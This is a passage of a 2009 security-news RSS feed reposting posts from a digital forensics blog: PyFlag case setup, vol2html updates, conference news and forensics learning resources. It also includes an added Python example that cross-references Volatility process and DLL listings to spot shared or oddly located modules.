You must use quotes around the new-passwd you choose, and don't forget what it is. Then start PyFlag by typing "pyflag" (without quotes) at the command line. By default PyFlag listens on port 8000, so simply open your browser and go to http://127.0.0.1:8000. You can modify settings at this point. You will then have to initialize the database, after which you will see a success message. Now you are ready to start a new case, which you can do under case management. Give the case a name, and you will see confirmation that your case is created. Now you can load your evidence. In this case, I am loading a USB image. Type 0 (zero) for the offset, give your evidence some unique name you'll remember and press submit. If things work out, Sleuthkit will identify the file system type; enter a mount point (this could be anything, I'm using /usb, but it could be D: or whatever). You will then see the uploading dialog. Note: DO NOT BE IMPATIENT. Let it finish uploading. You will notice that it refreshes every now and then as it uploads more from the filesystem. It will then redirect to the analysis screen, and you can browse the filesystem.</description><link>http://www.secuobs.com/revue/news/97768.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97768.shtml</guid></item>
<item><title>Briefly: vol2html update</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I have added a very small update to vol2html. Other than fixing some typos and cleaning up the code a little bit, I have added more information about DLL files. Like the last update, you can now see information about which processes have the same dll open. There will be more; however, I think that it might be better to write a module for Volatility at this time. Here are vol2html.pl and a new html report. Let me know if you find any bugs :-)</description><link>http://www.secuobs.com/revue/news/97767.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97767.shtml</guid></item>
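The cross-reference that the three vol2html posts above describe (which processes have the same DLL or file open, and how many times each process has it) is small enough to show directly. The script below is an added example for this digest; it is not the blog's vol2html.pl and not Volatility code. It assumes the whitespace-separated column layout of Volatility 1.x's pslist and dlllist text output, and the two listings it parses are constructed here, not captured from a real memory image. It also adds the check an analyst makes from the per-file view: a module name that is loaded from more than one directory across the image.

```python
"""Correlate Volatility-style pslist and dlllist text output.

Added example, not vol2html.pl and not Volatility code: it parses
constructed text in the column layout of Volatility 1.x's pslist and
dlllist plugins (assumed here, not captured from a real image) and
builds the cross-reference vol2html reports: which processes have the
same DLL loaded and how many times each process maps it.
"""
import re
from collections import defaultdict

# Constructed sample pslist output: Name Pid PPid Thds Hnds Time.
PSLIST_TXT = """\
Name                 Pid    PPid   Thds   Hnds   Time
System               4      0      56     253    Thu Jan 01 00:00:00 1970
smss.exe             368    4      3      21     Mon Feb 09 10:11:12 2009
csrss.exe            584    368    12     420    Mon Feb 09 10:11:13 2009
explorer.exe         1456   1400   14     310    Mon Feb 09 10:11:40 2009
"""

# Constructed sample dlllist output: one block per process, introduced by
# a "name pid: N" line, then Base / Size / Path rows.
DLLLIST_TXT = """\
************************************************************************
smss.exe pid: 368
Command line : \\SystemRoot\\System32\\smss.exe

Base         Size         Path
0x48580000   0xf000       \\SystemRoot\\System32\\smss.exe
0x7c900000   0xb0000      C:\\WINDOWS\\system32\\ntdll.dll
************************************************************************
csrss.exe pid: 584
Command line : C:\\WINDOWS\\system32\\csrss.exe

Base         Size         Path
0x4a680000   0x5000       \\??\\C:\\WINDOWS\\system32\\csrss.exe
0x7c900000   0xb0000      C:\\WINDOWS\\system32\\ntdll.dll
0x75b40000   0xb000       C:\\WINDOWS\\system32\\CSRSRV.dll
************************************************************************
explorer.exe pid: 1456
Command line : C:\\WINDOWS\\Explorer.EXE

Base         Size         Path
0x01000000   0xff000      C:\\WINDOWS\\Explorer.EXE
0x7c900000   0xb0000      C:\\WINDOWS\\system32\\ntdll.dll
0x7c800000   0xf6000      C:\\WINDOWS\\system32\\kernel32.dll
0x10000000   0x6000       C:\\Documents and Settings\\user\\Local Settings\\Temp\\kernel32.dll
"""

PS_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.*)$")
DLL_HEAD = re.compile(r"^(\S+) pid: (\d+)\s*$")
DLL_ROW = re.compile(r"^0x[0-9a-fA-F]+\s+0x[0-9a-fA-F]+\s+(\S.*?)\s*$")


def parse_pslist(text):
    """Return {pid: name}; the header line does not match PS_ROW and is skipped."""
    procs = {}
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1)
    return procs


def parse_dlllist(text):
    """Return {pid: [path, ...]} from dlllist text, in listing order."""
    dlls = defaultdict(list)
    pid = None
    for line in text.splitlines():
        head = DLL_HEAD.match(line)
        if head:
            pid = int(head.group(2))
            continue
        row = DLL_ROW.match(line)
        if row and pid is not None:
            dlls[pid].append(row.group(1))
    return dict(dlls)


def cross_reference(dlls_by_pid):
    """Invert the per-process lists into {module name: {pid: times mapped}}.

    Keys are lower-cased file names, so \\SystemRoot\\System32\\ntdll.dll and
    C:\\WINDOWS\\system32\\ntdll.dll land on one key; directory_variants()
    keeps the distinct directories.
    """
    xref = defaultdict(lambda: defaultdict(int))
    for pid, paths in dlls_by_pid.items():
        for path in paths:
            name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
            xref[name][pid] += 1
    return {name: dict(pids) for name, pids in xref.items()}


def shared_modules(xref, min_procs=2):
    """Modules mapped by at least min_procs processes, most shared first."""
    hits = [(name, len(pids)) for name, pids in xref.items() if len(pids) >= min_procs]
    return sorted(hits, key=lambda item: (-item[1], item[0]))


def directory_variants(dlls_by_pid):
    """Module names loaded from more than one directory: {name: sorted dirs}.

    A well-known name such as kernel32.dll sitting under a user-writable
    path next to the real one in system32 is what this surfaces.
    """
    dirs = defaultdict(set)
    for paths in dlls_by_pid.values():
        for path in paths:
            head, _, tail = path.replace("/", "\\").rpartition("\\")
            dirs[tail.lower()].add(head.lower())
    return {name: sorted(d) for name, d in dirs.items() if len(d) > 1}


def text_report(procs, dlls_by_pid):
    """Plain-text per-module view: module, then each pid (name) and its count."""
    lines = []
    for name, pids in sorted(cross_reference(dlls_by_pid).items()):
        who = ", ".join("%d (%s) x%d" % (pid, procs.get(pid, "?"), n)
                        for pid, n in sorted(pids.items()))
        lines.append("%s: %s" % (name, who))
    return "\n".join(lines)


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_TXT)
    dlls = parse_dlllist(DLLLIST_TXT)
    print(text_report(procs, dlls))
    print("shared:", shared_modules(cross_reference(dlls)))
    print("loaded from several directories:", directory_variants(dlls))
```

Keying on the file name rather than the full path is a deliberate choice: it is what makes \SystemRoot and C:\WINDOWS spellings of the same module line up, and directory_variants() is there precisely so that merging does not hide a second copy living somewhere it should not.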
<item><title>Briefly: IWCMC 2009</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Jarek's, Prof. Bilal Khan's (BK) and my paper on Permeate was accepted at IWCMC 2009 (Computer and Network Security Symposium). The final paper will be available at the Permeate site after some final editing. Shouts to Jarek and BK.</description><link>http://www.secuobs.com/revue/news/97766.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97766.shtml</guid></item>
<item><title>Briefly: CEIC 2009</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I will attend and present at the CEIC conference in Orlando, FL. The agenda is available online and it looks like there will be a lot of interesting talks/labs to see and participate in. It should be fun.</description><link>http://www.secuobs.com/revue/news/97765.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97765.shtml</guid></item>
<item><title>Some Links and Information</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Well, it's been a little while since I was last writing on here. Things have been busy, but it will pick up on here soon ;-) In the mean time, I'll post some interesting things I've come across. I am personally always looking for more information on various computer forensics/security topics. After a recent conversation with some friends of mine from the John Jay College forensics program about how one can keep up with changes in these fields, I thought I might share a few resources that I use. Hopefully some of these links will be interesting to some of you. Instead of focusing on a particular tool, I'm going to focus on the human factor: where do you find people who are interested/experts in these fields? Where can you hear them talk? Where can you interact with them? Where can you get further information about a particular subject?

Podcasts / Webcasts

There are some interesting podcasts out there. Most people already know about them, but what the heck, I'm going to list some anyway, in alphabetical order:

* Cyberspeak podcast
* Exotic Liability
* Forensic 4cast
* Pauldotcom
* Sans Webcasts
* Talk Forensics

SANS' last webcast was a very good overview of what can be accomplished with memory forensics. Also, Talk Forensics and PaulDotCom recently had two great podcasts with Harlan Carvey - the man of Windows Forensics. Exotic Liability is a fairly new security podcast that is extremely interesting and entertaining. The nice thing about most of these podcasts is that you can ask questions in real time by online chat or by calling in to the show.

Forums / Listserves

Well, there are a ton of different forums/listserves for various things. Here is a short list:

Forums
* Defcon forums
* Forensic Focus Forums
* Guidance Software forum
* RegRipper forum
* Rootkit.com

Listserves
* Linux Forensics Listserv
* Metasploit Listserv
* Volatility Users and Developers Listserves
* Windows Forensics Listserv

Blogs

There are just too, too many to list. So, I'll tell you what I'll do: I'll give you my edited Google Feeds xml file if you are interested in finding more blogs. If you use Google Reader you can just import the file. I've tried to split things up into 3 categories: Forensics, Technical Law and Security. Some things overlap. Don't be offended if you own one of these blogs and aren't "listed correctly". One thing I like about using Google Reader is the ability to search over the blog posts. There are lots of times I remember reading something, but can't quite remember where I found it; this helps.

Twitter

Lots of computer forensics and security professionals can be found on Twitter. I've enjoyed my time on twitter talking with everyone there. Since I'm afraid to leave anyone out, I'll abstain from listing anyone at this point, but most of the people discussed above are on twitter, and if you just search for security or forensics you'll end up finding a few more. Also, a lot of people who maintain blogs post links to their twitter profiles. Now of course, there is always the chance that someone could be "disinformational", either on purpose or not (Didier Stevens is not, by the way ;-), but more than likely you will learn a lot from people and will keep up with current events.

LinkedIn

In spite of some of the bad things that have happened on LinkedIn in the past, it is a very helpful tool for networking and gaining information. In addition to establishing contacts with others who are in your field, you can also join groups for your interests. There are several computer forensics and security groups on LinkedIn that are very "happening" as far as member participation. Joining is easy. Some groups may have criteria about who may join, but you can search for groups by subject and decide which ones fit your interests.

Well, that's enough for now. I'm going back to hang out on #volatility on irc.freenode.net ;-)</description><link>http://www.secuobs.com/revue/news/97764.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97764.shtml</guid></item>
</channel>
</rss>
 
